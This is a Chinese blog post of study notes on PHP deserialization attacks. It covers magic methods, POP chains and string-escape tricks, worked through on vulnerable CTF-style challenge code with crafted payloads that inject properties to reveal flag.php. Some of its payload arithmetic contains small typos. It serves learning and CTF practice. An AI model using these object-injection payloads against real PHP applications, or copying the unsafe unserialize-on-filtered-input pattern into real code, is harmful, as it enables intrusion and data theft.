php反序列化学习(2)

最新推荐文章于 2024-07-25 22:24:14 发布
最新推荐文章于 2024-07-25 22:24:14 发布
阅读量1k 收藏 28
点赞数 9
文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_79119987/article/details/139278270
版权

 1、魔术方法触发规则:

魔术方法触发的前提是:魔法方法所在类(或对象)被调用

分析代码,_wakeup()的触发条件是进行反序列化,_tostrinng()触发的条件是把对象当成字符串调用,但是魔术方法触发的前提是:魔法方法所在类(或对象)被调用,所以_wakeup()没有调用,echo将反序列化的对象当做字符串使用,则_tostrinng()被触发。如果要输出“tostring is here”就需要调用_tostrinng()函数,所以要在source中包含sec实例化的对象

构造得到payload

2、pop链构造与poc编写

pop链:

pop链就是利用魔法方法在里面实现多次跳转然后获取敏感数据的一种payload。

poc:中文译做概念验证,可以理解为漏洞验证程序,是一段不完整的代码(用于验证提出者观点)

首先分析代码,目标:触发echo,调用flag
第一步:触发invoke,调用append,并使Svar=flag.php(invoke触发条件:把对象当成函数)

给Sp赋值为对象,即function成为对象Modifier
却被当成函数调用,触发Modifier中的invoke

第二步:触发get,(触发条件:调用不存在的成员属性)给Sstr赋值为对象Test,而Test中不存在成员属性source,
则可触发Test里的成员方法get
第三步:触发toString (触发条件:把对象当成字符串)给Ssource赋值为对象Show,当成字符串被echo调用,触发toString

据此写出构造payload的代码

因为private属性所以要在前后加上%00后上传。

3、字符串逃逸:

字符减少:

反序列化分隔符:反序列化以;}结束,后面的字符串不影响正常的反序列化

属性逃逸:一般在数据经过一次serialize再经过unserialize,在这个中间反序列化的字符串变多或者变少时可能存在反序列化属性逃逸。

原因:

1、成员属性数量不对

2、成员属性名称长度不对

3、内容长度不对

在前面字符串没有问题的情况下,;}是反序列化的结束符,后面的字符串不影响反序列化结果。但是;}不一定都是结束符,是字符串还是格式符是由前面的数字判断的。

<?php
highlight_file(__FILE__);
error_reporting(0);
class A{
    public $v1 = "abcsystem()system()system()";
    public $v2 = '123';

    public function __construct($arga,$argc){
            $this->v1 = $arga;
            $this->v2 = $argc;
    }
}
$a = $_GET['v1'];
$b = $_GET['v2'];
$data = serialize(new A($a,$b));
$data = str_replace("system()","",$data);
var_dump(unserialize($data));
?>

  分析:

  O:1:"A":2:{s:2:"v1";s:11:"abc";s:2:"v2";s:3:"123";}

    如果要逃逸123,就把前面的代码abc";s:2:"v2";s:3:"变成一个字符串

    思路:通过修改$v2的值123使后面的字符串变为功能性代码;s:2:"v3";N;}实现属性v2的逃逸

    O:1:"A":2:{s:2:"v1";s:?:"abc";s:2:"v2";s:?:";s:2:"v3";N;}";}

   (字符串缺失导致格式被破坏,system()被吃掉,abc";s:2:"v长度为11; 令O:1:"A":2:{s:2:"v1";s:?:"abc";s:2:"v2";s:3:"123";})

  因此需要让123前面的代码abc";s:2:"v2";s:3:"成为一个字符串

    O:1:"A":2:{s:2:"v1";s:?:"abc";s:2:"v2";s:xx:";s:2:"v3";N;}
   

一个system()可以替换掉8个字符,abc";s:2:"v2";s:xx:";长度为20,所以前面最少要吃掉3个system()

    O:1:"A":2:{s:2:"v1";s:27:"abcsystem()system()syestem()";s:2:"v2";s:xx:";s:2:"v3";N;}";}

    abcsystem()system()syestem()的长度是27,吃掉后abc";s:2:"v2";s:xx:"长度为20,

    所以后面还要再补上7个字符,故:

    O:1:"A":2:{s:2:"v1";s:27:"abcsystem()system()syestem()";s:2:"v2";s:21:"1234567";s:2:"v3";N;}";}

所以,v1赋值为abcsystem()system()system();v2赋值为1234567";s:2:"v3";N;}

字符逃逸减少例题:

<?php
highlight_file(__FILE__);
error_reporting(0);
function filter($name){
    $safe=array("flag","php");
    $name=str_replace($safe,"hk",$name);
    return $name;
}
class test{
    var $user;
    var $pass;
    var $vip = false ;
    function __construct($user,$pass){
        $this->user=$user;
    $this->pass=$pass;
    }
}
$param=$_GET['user'];
$pass=$_GET['pass'];
$param=serialize(new test($param,$pass));
$profile=unserialize(filter($param));

if ($profile->vip){
    echo file_get_contents("flag.php");
}
?>

要输出flag就需要if ($profile->vip){判断为真,因此在赋值时需要将其值改为true。

一:字符串过滤后减少还是增多
二:构造出关键成员属性序列化字符串
$vip=ture
三:变少则判断吃掉的内容,并计算长度
四:构造payload并输出

O:4:"test":3:{s:4:"user";s:4:"flag";s:4:"pass";s:3:"dun";s:3:"vip";b:1;}

flag被替换成hk,字符声减少会吃掉后面的结构代码

关键代码";s:3:"vip";b:1;}需要吃掉吃掉”:s:4"pass";s:3,$pass的值dun可控,可实现字符串逃逸。

但是这样的话成员属性就会减少一个,所以要多吃一个1,吃掉":s:4:"pass"'s:Xx:"1,这样总共吃了20位,flag转变成hk每次吃掉2个字符,所以共需要10个flag而多吃的一位可以在后面补。

给关键成员属性赋值,得到初始序列化代码。

<?php
//function filter($name){
//    $safe=array("flag","php");
//    $name=str_replace($safe,"hk",$name);
//    return $name;
//}
class test{
    var $user = 'flag';
    var $pass = 'dun';
    var $vip = true ;
//    function __construct($user,$pass){
//        $this->user=$user;
//        $this->pass=$pass;
//    }
//}
//$param=$_GET['user'];
//$pass=$_GET['pass'];
//$param=serialize(new test($param,$pass));
//$profile=unserialize(filter($param));
//
//if ($profile->vip){
//    echo file_get_contents("flag.php");
}
echo serialize(new test());
?>

用目标代码赋值($pass的值dun可控,可实现字符串逃逸。)

给pass赋值:1 ";s:4:"pass";s:3:"dun";s:3:"vip";b:1;}  (flag转变成hk每次吃掉2个字符,所以共需要10个flag而多吃的一位可以在后面补

user赋值:flagflagflagflagflagflagflagflagflagflag

<?php
//function filter($name){
//    $safe=array("flag","php");
//    $name=str_replace($safe,"hk",$name);
//    return $name;
//}
class test{
    var $user = 'flagflagflagflagflagflagflagflagflagflag';
    var $pass = '1 ";s:4:"pass";s:3:"dun";s:3:"vip";b:1;}';
    var $vip = true ;
//    function __construct($user,$pass){
//        $this->user=$user;
//        $this->pass=$pass;
//    }
//}
//$param=$_GET['user'];
//$pass=$_GET['pass'];
//$param=serialize(new test($param,$pass));
//$profile=unserialize(filter($param));
//
//if ($profile->vip){
//    echo file_get_contents("flag.php");
}
echo serialize(new test());
?>

字符增多:(例题)

<?php
highlight_file(__FILE__);
error_reporting(0);
function filter($name){
    $safe=array("flag","php");
    $name=str_replace($safe,"hack",$name);
    return $name;
}
class test{
    var $user;
    var $pass='daydream';
    function __construct($user){
        $this->user=$user;
    }
}
$param=$_GET['param'];
$param=serialize(new test($param));
$profile=unserialize(filter($param));

if ($profile->pass=='escaping'){
    echo file_get_contents("flag.php");
}
?>

首先观察代码发现替换后字符串增加

<?php
class test
{

    var $user = 'dun';
    var $pass = 'escaping';
}
echo serialize(new test());

?>

O:4:"test":2:{s:4:"user";s:3:"dun";s:4:"pass";s:8:"escaping";}

得到结果,";s:4:"pass";s:8:"escaping";}就是需要逃逸的内容,共有29个,每个hack替换一个php,则替换29个字符需要输入29个php,所以user=phpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphp";s:4:"pass";s:8:"escaping";}

<?php
class test
{

    var $user = 'phpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphp";s:4:"pass";s:8:"escaping";}';
    var $pass = 'escaping';
}
//echo serialize(new test());

$a = serialize(new test());    
$a = str_replace("php","hack",$a);
echo $a;   

?>

O:4:"test":2:{s:4:"user";s:116:"hackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhack";s:4:"pass";s:8:"escaping";}";s:4:"pass";s:8:"escaping";}

总结:

反序列化字符串减少逃逸:多逃逸出一个成员属性,第一个字符串减少,吃掉有效代码,在第二个字符串构造代码
反序列化字符串增多逃逸:构造出一个逃逸成员属性第一个字符串增多,吐出多余代码,把多余位代码构造成逃逸的成员属性

真.159
关注
  • 9
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
详解PHP序列化和反序列化原理
10-18
本篇文章给大家分享了下PHP反序列化漏洞系列之PHP序列化和反序列化原理的相关知识,有这方面需要的朋友参考学习下吧。
详解php反序列化
10-15
主要介绍了php反序列化的相关知识,文中讲解非常细致,代码帮助各位更好的理解和学习,感兴趣的朋友可以了解下
初识PHP反序列化
weixin_60719780的博客
02-05 627
但是如果想注入恶意payload,还需要对$test的值进行覆盖,题目中已经给出了序列化链,很明显是对类A的$test变量进行覆盖,将POST接收的phpin佛()值覆盖所定义的值,这里也可以传入一句话木马等,利用我们的eval危险函数(任意命令执行)进行执行。在执行unserialize()方法时会触发__wakeup()方法执行,将传入的字符串反序列化后,会替换掉test类里面$test变量的值,将php探针写入flag.php文件中,并通过下面的require引用,导致命令执行。
php反序列化及__toString()
sinat_31884905的博客
02-21 3497
主要两个文件 index.php <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){ echo "hello admin!<br>"; if(preg_match("/f1a9/",$file)){ e
php反序列化学习(中)--pop链的构造
qq_75120258的博客
04-24 865
打开环境,进行代码审计这一题我们需要构造pop链,既然要构造pop链,我们就要找到链头和链尾(从链尾在到链头,一步一步的看,这样就思路清晰了)我们先去找链尾,我们需要通过这个file_get_contents()函数来获得flag。
php反序列化学习
qq_51233573的博客
01-24 448
❤何为php反序列化 序列化把本来不能直接存储的数据转换成可存储的数据,并且不会丢掉数据格式,而反序列化就是把序列化的数据,转换成我们需要的格式,序列化和反序列化互为逆过程 php反序列化本身不危险,但是反序列化过程中,传入的参数可以被外部用户控制就会造成很大的危害。 ❤php类可能会包含一些特殊的函数,名为magic函数,magic函数命名是以符号“__”开头的,比如__construct, __destruct,__toString, __sleep, __wakeup,这些函数在某些情况下会自动
php反序列化学习之字符串逃逸
m0_54903333的博客
04-28 598
php反序列化时,会严格按照字符串长度来读取后面的字符串,如果长度不对,就会反序列化失败,返回一个布尔变量false,我看其他大佬的文章这里都会报错,可能是php版本不同,如:我们把原来的4改为3,php在读取时就会往后面读取3个字符:nam,然后结束这个字符串的读取**,正常来说接下来该读取结束符 “;来构成闭合,但是没有,而是读取到了e,于是反序列化失败**,返回false,如果改为5,就会读取 name” 然后结束,也是无法闭合而失败。
php 序列化和反序列化学习-1
08-03
PHP中,序列化和反序列化是两个重要的概念,它们用于将数据对象转换为字符串以便存储或传输,以及将字符串还原为原始的数据结构。在本文中,我们将深入探讨这两个概念,以及它们在PHP中的应用。 首先,让我们了解...
php代码-ctf payload 第九题 反序列化 do you know robot
07-15
第九题的标题暗示我们需要理解并利用PHP反序列化机制来解决这个问题。PHP是一种广泛使用的服务器端脚本语言,其在处理序列化和反序列化数据时可能存在安全风险。 序列化是将对象的状态转换为可存储或传输的数据...
unserialize:PHP 反序列化的 Node.js 端口
05-29
PHP 反序列化的 Node.js 端口 安装 npm install unserialize 用法 var unserialize = require('unserialize'); console.log(unserialize('a:2:{s:4:"name";s:4:"Andy";s:3:"age";i:82;}')); // { name: 'Andy', ...
AvaloniaUI的学习
最新发布
lishuangquan1987的博客
07-25 485
官方中文文档:https://docs.avaloniaui.net/zh-Hans/docs/welcome。
编程学习之路:从零到一的成长指南
KsuferNotes
07-22 442
在当今数字化时代,编程技能已经成为许多人职业发展的重要组成部分。不论你是已经在IT业从业多年的老手,还是刚刚起步的编程新手,这篇博客将带你走过编程学习的每一个重要阶段,从而顺利完成从零到一的华丽转变。
昇思25天学习打卡营第14天|Vision Transformer图像分类
Xavier_F的博客
07-21 662
本案例详细介绍了ViT模型在ImageNet数据集上的训练、验证和推理过程,重点讲解了模型的核心结构和关键概念,如Multi-Head Attention、Transformer Encoder和位置编码等。通过学习此案例,用户将掌握ViT的基本原理以及其在图像分类任务中的应用潜力,为深入研究计算机视觉领域提供了坚实基础。!
从0开始的STM32HAL库学习6
hwq_1229_0525的博客
07-21 355
配置红色框图中的各种配置时钟源选择外部时钟 21.预分频器Prescaler,下面填0,不分频2.计数模式,计数模式选择为向上计数3.自动重装寄存器,自动重装计数器填为10,计数到10后清空并出发中断4.滤波器的频率分频:不使用影子寄存器。
FastAPI(七十一)实战开发《在线课程学习系统》接口开发-- 查看留言
mr~li的博客
07-24 218
梳理后发现,之前在接口设计的时候,有些欠缺,查看留言,是查看单个的留言,查看留言后,对应的留言变成已读状态。那么我们这个都需要传递一个参数,这个参数应该是留言的id。之前FastAPI(七十)实战开发《在线课程学习系统》接口开发--留言功能开发分享了留言开发,这次我们分享查看留言。在之前设计返回状态码的时候,发现状态码有缺失,我们增加下缺失的。3.判断是否是当前用户的留言,或者接受的方是自己。梳理这里的逻辑,这个接口要依赖登录。5.如果已读且回复了,要带回复的内容。以上则是实现查看留言的接口逻辑。
学习华为IPD流程黑话2.0
产品线负责人
07-23 523
管道管理是指根据资源需求(管道需求)尽早地对可获得性资源(管道供给)进行平衡,任何企业做研发、做产品,它的可用资源都是有限的,可以把企业的资源比喻成管道。既是对产品包进行验证,也是内部技能传递的重要环节,同时能为客户带来价值。这个时候就只需要对切片的概念做一下了解就应该可以直接应用了。而且主要做的是 C 语言,Python 也确实没具体用过。并保证在任意时刻产出的研发价值(即出口流量)的最大化,好了,这个话题就不展开来讲了,后续可以单独展开聊聊。评审的对象是新产品的业务计划,而不是产品的开发计划。
DP学习——外观模式
huibin.yun的博客
07-24 198
学而时习之,温故而知新。
后端开发工程师vue2初识的学习
音符犹如代码的博客
07-24 931
快速认识vue
php反序列化如何学习
09-25
总之,学习PHP反序列化需要了解序列化和反序列化的概念、掌握PHP的序列化函数、学习序列化格式、了解反序列化漏洞以及进行实践练习。通过不断学习和实践,可以提高对PHP反序列化的理解和应用能力。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值